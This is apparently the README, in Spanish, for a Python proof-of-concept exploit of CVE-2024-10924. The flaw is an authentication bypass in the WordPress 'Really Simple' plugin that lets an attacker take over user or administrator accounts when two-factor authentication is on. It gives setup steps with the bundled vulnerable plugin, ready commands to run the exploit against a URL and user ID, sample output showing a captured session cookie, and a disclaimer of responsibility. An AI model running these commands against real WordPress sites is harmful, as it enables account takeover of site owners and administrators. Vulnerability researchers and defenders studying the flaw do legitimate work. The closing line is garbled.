
POC para CVE-2024-10924 escrito en Python
Un fallo de manejo de errores en la API REST del plugin de WordPress Really Simple Plugins (versiones entre la 9.0.0 y la 9.1.1.1, ambas incluidas) permite a un atacante, cuando la autenticación de dos factores está habilitada, evadir la autenticación y tomar el control de una cuenta de usuario o administrador existente.
Como soy un buen tipo, también encontrarás la versión 9.1.1.1 del plugin. Solo descomprímela y súbela a la carpeta wp-content/plugins. No olvides activar el plugin y habilitar la 2FA.
Instala las dependencias necesarias usando pip:
pip install -r requirements.txt
python exploit.py [-id USER_ID] URL
Con un ID de usuario específico:
python exploit.py -id 10 http://localhost:8886/
Esto envía el payload de explotación con un ID de usuario de 10.
Sin especificar el ID de usuario:
python exploit.py http://localhost
Establece el ID de usuario por defecto en 1.
Exploit successful.
--------------------------------------------------
session_id=xyz123; path=/; HttpOnly
--------------------------------------------------
Exploit failed. Maybe the target is not vulnerable or the user ID is incorrect.
verify=False) solo si es necesario para las pruebas.No lo sé, pero no soy responsable de nada.